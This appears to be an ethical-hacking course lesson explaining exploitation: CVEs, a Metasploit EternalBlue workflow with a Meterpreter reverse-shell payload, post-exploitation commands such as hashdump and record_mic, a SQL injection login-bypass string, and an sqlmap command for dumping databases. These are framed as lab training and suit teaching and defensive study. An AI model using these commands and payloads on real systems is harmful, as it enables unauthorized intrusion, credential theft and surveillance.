Ethical Hacking Exploitation Fundamentals

Exploitation is the phase where an ethical hacker attempts to take advantage of discovered vulnerabilities to gain unauthorized access to a system. Scanning tells you the doors are unlocked. Exploitation is opening them. Understanding how exploitation works is essential for an ethical hacker — both for conducting controlled tests and for understanding what defenders need to protect against.

What Is a Vulnerability?

A vulnerability is a weakness in a system, application, or process that an attacker can use to cause harm. Vulnerabilities come from many sources:

  • Programming errors — Buffer overflows, integer errors, unsafe function calls
  • Misconfiguration — Default credentials, unnecessary services enabled, open file shares
  • Design flaws — Protocols designed without security in mind (early Telnet, FTP)
  • Missing patches — Known vulnerabilities with available fixes that have not been applied
  • Logic errors — Authentication bypasses caused by flawed business logic

CVE: The Vulnerability Catalog

CVE stands for Common Vulnerabilities and Exposures. It is a publicly maintained catalog where every known vulnerability gets a unique identifier. A CVE entry looks like:

CVE-2021-44228 — This is the Log4Shell vulnerability in the Apache Log4j library, one of the most critical vulnerabilities ever discovered. It allowed attackers to execute arbitrary code on millions of servers by sending a single specially crafted log message.

When an ethical hacker identifies a software version during scanning, they search the CVE database (cve.mitre.org) or the National Vulnerability Database (NVD) for known vulnerabilities affecting that version. Each CVE entry includes a severity score (CVSS score from 0 to 10), a description, and often proof-of-concept exploit code.

The Metasploit Framework

Metasploit is the most widely used exploitation framework in ethical hacking. It is a platform that organizes thousands of pre-built exploit modules, payload generators, and post-exploitation tools into a single interface. Instead of writing exploit code from scratch, an ethical hacker selects a module, configures it with the target's details, and launches the attack.

Key Metasploit Concepts

TermDefinitionExample
ExploitCode that takes advantage of a specific vulnerabilityEternalBlue exploit for MS17-010 (SMB)
PayloadCode that runs on the target after a successful exploitMeterpreter reverse shell
ModuleA self-contained unit in Metasploit (exploit, scanner, payload)exploit/windows/smb/ms17_010_eternalblue
LHOSTThe attacker's IP address (Local Host)192.168.1.100 (Kali Linux machine)
RHOSTThe target's IP address (Remote Host)192.168.1.10 (Metasploitable VM)
SessionAn active connection to a compromised targetMeterpreter session opened on target

Basic Metasploit Workflow

Every Metasploit exploitation follows the same pattern:

  1. Start Metasploit: msfconsole
  2. Search for an exploit: search ms17_010
  3. Select the module: use exploit/windows/smb/ms17_010_eternalblue
  4. Set the target IP: set RHOSTS 192.168.1.10
  5. Set the attacker IP: set LHOST 192.168.1.100
  6. Select a payload: set payload windows/x64/meterpreter/reverse_tcp
  7. Launch the exploit: run

If the target is vulnerable and unpatched, Metasploit opens a Meterpreter session — an interactive shell on the target system.

Meterpreter: Post-Exploitation Shell

Meterpreter is Metasploit's advanced payload. Once it runs on a target, it provides the attacker with an interactive command shell that operates entirely in memory — it writes nothing to disk, making it difficult for antivirus software to detect.

From a Meterpreter session, an ethical hacker can:

  • Browse the file system: ls, cd, download
  • Take a screenshot of the target's screen: screenshot
  • Record audio from the microphone: record_mic
  • Dump password hashes from Windows: hashdump
  • Elevate privileges: getsystem
  • Pivot to other machines on the internal network: route add

In a real penetration test report, every action taken through Meterpreter is documented to demonstrate what an attacker could have accessed.

Buffer Overflow: Understanding the Exploit Concept

A buffer overflow is one of the oldest and most fundamental vulnerability classes. Understanding it conceptually shows how exploitation actually works at a low level.

Imagine a parking lot with 10 spaces. Cars arrive and park in order. When an 11th car arrives and the lot manager does not enforce the limit, the car parks outside the designated area — potentially blocking an emergency exit or covering a road marking.

In programming, a buffer is a fixed-size block of memory reserved for input. If a program accepts input without checking its length, and the input is larger than the buffer, the excess data overwrites adjacent memory. An attacker carefully crafts input so the overflow overwrites the memory address the program uses to decide what code to run next. By controlling that address, the attacker redirects execution to their own malicious code.

Modern operating systems use several protections — ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention), and stack canaries — to make buffer overflows harder to exploit. Bypassing these protections is an advanced skill covered in later topics.

Exploiting Web Applications Manually

Web application exploitation does not always require Metasploit. Many attacks are performed manually using a browser and an intercepting proxy like Burp Suite.

Exploiting SQL Injection Manually

A login form with a SQL injection vulnerability might use a query like:

SELECT * FROM users WHERE username='INPUT' AND password='INPUT'

Entering the following in the username field:

' OR '1'='1' --

Transforms the query to:

SELECT * FROM users WHERE username='' OR '1'='1' --' AND password='anything'

The -- comments out the rest of the query. Since '1'='1' is always true, the database returns the first user in the table — usually the administrator account. The attacker logs in without knowing any password.

SQLMap: Automated SQL Injection

SQLMap is a Kali Linux tool that automates SQL injection detection and exploitation. Point it at a URL with a parameter and it tests dozens of injection techniques automatically, then dumps the database contents if a vulnerability is found.

sqlmap -u "http://192.168.1.10/login.php?id=1" --dbs

Client-Side Exploits

Not every exploit targets a server. Client-side exploits target software running on the victim's machine — typically triggered when the victim opens a malicious document or visits a crafted web page.

Malicious PDF or Office Document

Metasploit can generate a Microsoft Word document that, when opened, executes a payload and connects back to the attacker's machine. The ethical hacker sends this to a test user account during a phishing simulation to demonstrate the risk of opening untrusted attachments.

Browser Exploitation Framework (BeEF)

BeEF hooks browsers by injecting JavaScript into a web page visited by the target. Once hooked, BeEF can take screenshots, redirect the browser, steal cookies, probe the internal network from the victim's browser, and launch further attacks — all silently while the user browses normally.

Exploitation Diagram: The Attack Chain

Picture a multi-step robbery at an office building:

  • Step 1 — Reconaissance: The robber observes the building, notes shift changes, identifies entry points (reconnaissance).
  • Step 2 — Find an unlocked window: The robber tests each window until one opens (scanning and vulnerability discovery).
  • Step 3 — Climb in: The robber enters through the unlocked window (exploitation).
  • Step 4 — Find the safe: The robber searches the office for valuables (post-exploitation).
  • Step 5 — Leave without a trace: The robber clears evidence of entry (covering tracks).

An ethical hacker documents every step — including exactly which window was unlocked and what was accessible inside — so the building owner can fix the problems.

Key Points

  • A vulnerability is a weakness a hacker exploits; CVE is the public catalog that assigns every known vulnerability a unique identifier.
  • Metasploit organizes thousands of exploits into a single framework and automates the exploitation process.
  • Meterpreter provides an in-memory shell after exploitation and supports post-exploitation activities like privilege escalation and lateral movement.
  • Buffer overflows redirect program execution by overwriting memory with attacker-controlled data.
  • Web application attacks like SQL injection can be exploited manually or with automated tools like SQLMap.
  • Client-side exploits target victim software through malicious documents or browser-based attacks.
Previous lessons
Back to courses
Next lessons

Leave a Comment